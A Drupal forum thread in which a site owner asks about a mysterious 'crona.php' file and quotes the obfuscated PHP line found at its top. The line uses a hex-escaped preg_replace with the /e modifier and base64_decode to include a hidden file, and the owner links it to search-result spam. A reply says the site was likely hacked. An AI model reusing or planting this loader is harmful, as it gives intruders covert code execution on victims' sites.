Come together with the global Drupal community in Rotterdam, 28 Sept – 1 Oct 2026. Sessions, contribution, connection, and Early Bird savings until 8 June.
By Carl Shuller on
I noticed today a new file in my root directory called 'crona.php'. It looks very much like 'index.php' except it has some cryptic code at the top:
@preg_replace("\x40\50\x2e\53\x29\100\x69\145","\x69\156\x63\154\x75\144\x65\50\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65\50\x22\134\x31\42\x29\51\x3b","\x4c\63\x64\154\x59\151\x39\60\x63\155\x46\165\x63\62\x6c\60\x61\127\x39\165\x64\130\x4d\165\x62\63\x4a\156\x4c\63\x64\63\x64\171\x39\164\x62\62\x52\61\x62\107\x56\172\x4c\63\x4e\154\x59\130\x4a\152\x61\103\x39\172\x5a\127\x46\171\x59\62\x67\166\x4c\151\x55\64\x4d\152\x68\106\x4a\124\x41\167\x4d\124\x4d\154\x51\152\x68\107\x4d\171\x56\103\x51\172\x46\103\x4a\125\x49\171\x4d\153\x49\154\x4e\105\x59\61\x4e\167\x3d\75");
include("index.php"); exit;
When I changed the file name (crona.php.wtf) it resulted in an 'access forbidden' message when trying to bring up the site. Simply changing the file name back resulted in the site coming back.
The above code string was being placed into the index.php file earlier this week and we thought it was due to someone having access to our FTP user/pw. When we changed the ftp pw the index.php file no longer was getting modified. This code results in an ad for xanax to show up under our site name in search results.
I did a Google search on 'crona.php' and found nothing.
Anyone else seen this kind of thing before?
Comments
You may have been hacked. You
You may have been hacked. You should re-install core. Download a fresh copy of core, and drop it in over top of all your current core files.
Contact me to contract me for D7 -> D10/11 migrations.